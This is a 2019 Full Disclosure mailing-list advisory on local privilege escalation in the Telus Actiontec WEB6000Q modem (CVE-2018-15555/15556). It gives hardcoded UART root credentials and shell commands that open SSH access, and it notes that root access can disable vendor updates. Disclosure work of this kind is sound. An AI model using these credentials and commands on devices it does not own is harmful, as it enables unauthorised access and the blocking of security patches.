[<prev] [next>] [day] [month] [year] [list]
Message-ID: <10595e7f-fefe-bee1-7670-823896cabe93@aklaus.ca>
Date: Sun, 9 Jun 2019 12:27:39 -0600
From: Andrew Klaus <andrew@...aus.ca>
To: fulldisclosure@...lists.org
Subject: [FD] [CVE-2018-15555 / 15556] Telus Actiontec WEB6000Q Local
Privilege Escalation
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
### Device Details
Discovered By: Andrew Klaus (andrew@...aus.ca)
Vendor: Actiontec (Telus Branded)
Model: WEB6000Q
Affected Firmware: 1.1.02.22
Reported: July 2018
CVE: CVE-2018-15555 (Main OS)
CVE: CVE-2018-15556 (Quantenna OS)
### Summary of Findings
Both “main” and “quantenna” have a UART header on the motherboard and
each of them provide full shell + bootloader access.
While the main OS has the credentials user: root pass: admin, the
quantenna environment can be accessed with user: root with an empty
password.
I used a Raspberry Pi to interface with the UART header, but there are
USB UART adapters to do the same thing.
Once root access is obtained, TR-069 Updating can be fully disabled,
preventing the vendor from pushing updates to the device.
### Proof of Concept
Hooking up a Raspberry Pi's UART GPIO header to either UART header on
the modem will give a login prompt. root/admin or root/(nopass)
depending on which modem header connected to.
### Enabling SSH daemon on Main OS
After retrieving a root shell on the main OS over UART, SSH can be
enabled by running the following:
# cli -s Device.X_ACTIONTEC_COM_RemoteLogin.Enable int 1
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
dropbear -p 22 -I 1800 &
$ ssh 192.168.1.2 -l admin -oKexAlgorithms=+diffie-hellman-group1-sha1
admin@....168.1.2's password:
BusyBox v1.17.2 (2016-02-03 21:34:18 PST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEE/rRUDraOzqmrp8tZoyRid8jQfpkFAlz9T5sACgkQoyRid8jQ
fpnL1BAAi+Bu1xcK9thQ0AHqamY7DZ4qkP3dhFVUtW5q3hoJ4T3GOLTj/9RJLaOI
J9FMvSMNAnTKtBcbTx4uvokRAbGLZEUPG1uk0Qu9wmC8tPliU0qHTCfU0vF2dFCI
rrhmpaJhu4Y/AEIpjZXg1/5p5hIAQn5DfNUwu6p5VbDlRbktu5UELcFtvgnVi7Jq
MUmNvPjbbxwfWlopb3kXASOh1SFLwe77AwmQmLQtIDknAyf2Ri9xfpf2wMGPqDTp
WH3SzNCE+HkpHH8omSgnX+yA51KeGipUXWao3UnGvqdHp02TFz5OZIHhgzLk2AfX
6k78qy44DMegaUld9KQeW4OeVESxQqVu9goIjbRMIIlLKRsvz1BwTM+wBu74z2vU
O8i1mzAPqloc8iIoIzLiu1dGzYTii4et6YMTq5GJiXL3PCTOJ8MR1/mxeebQwn9h
ebsmkn0I06ruR37apz0WGBx0p7t158Pjzc954JoMLubQO8Isk/2G02wcekLLXjVj
P2jxoJlnRplum7pKNQbfhAJ6VrGiyB9HY6VAarseqZzFLYJiL6u15EooKScVAg/0
ogZz/3G4m8yVZ37nnz64GNqZu/i18IRoPRGGfeYN/smKFhsKNtbw1JSWHk6VPTbN
jlJLOXvQ9149zFlmJJHCxKiQ3FHvghgfgoi9W5J0Lg4Q+lqIriU=
=POu3
-----END PGP SIGNATURE-----
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists